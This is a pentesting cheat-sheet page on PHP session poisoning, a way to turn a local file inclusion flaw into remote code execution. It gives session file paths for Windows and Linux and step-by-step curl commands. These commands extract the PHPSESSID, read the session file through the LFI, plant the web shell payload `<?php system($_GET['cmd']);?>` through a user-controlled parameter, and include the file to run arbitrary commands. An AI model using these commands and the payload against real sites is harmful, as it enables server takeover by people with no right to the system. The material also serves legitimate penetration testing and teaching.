PRIMARY CATEGORY → WEB ATTACKS
REFERENCES | |
---|---|
PHP Session Poisoning using LFI | See here |
PHP Session Poisoning - LFI to RCE
This attack vector requires writing PHP Code in a field we control that gets logged into a log file on the remote machine
Then, that file is included in order to execute PHP Code
For this attack to work, the user who executes the PHP or Apache processes, should have read privileges over the logged files
The PHP Session Poisoning works by poisoning a parameter stored inside the PHPSESSID cookie
System Path of PHPSESSID Details
Related PHP Directive → session.save_path
The details of PHPSESSID cookies are stored in session files on the back-end
Windows
C:\Windows\Temp\sess_<PHPSESSID_VALUE>
Linux
/var/lib/php/sessions/sess_<PHPSESSID_VALUE>
Exploitation
Extracting the PHPSESSID Value
curl --silent --request GET --location --head '<URL>' |& grep -i -- 'PHPSESSID'
Use the LFI to examine the PHPSESSID File Content
curl --silent --request GET --location 'http://domain.tdl/home.php?file=/var/lib/php/sessions/sess<PHPSESSID_VALUE>'
Poisoning Cookie’s Data controlled by the User
Next, check if any data in the session file is under your control i.e. if it can be modified by the user
- Example I
When a user logs into a Web Application, the user’s name appears as a field within the session file of the cookie
- Example II
The session file may contain a language
value which is controlled by the GET parameter ?language=<VALUE>
Writing PHP Code to the Session File through the controlled data
Therefore, an attacker could register a user whose name contains PHP Code and point to the session file through the LFI . This PHP Code will be executed
The same applies for the case of the URL Parameter, if there is a URL Parameter whose value is stored in the session file related to the user’s cookie, just poison this parameter by writing PHP Code as its value
curl --silent --location --request GET 'http[s]://domain.tld/index.php?language=<?php system($_GET["cmd"]);?>' # URL Encoded
Including the Session File using the LFI - Executing Commands through the Injected PHP Code
curl --silent --location --request GET 'https[s]://domain.tld/home.php?file=/var/lib/php/sessions/sess_<PHPSESSID_VALUE>&cmd=<COMMAND>'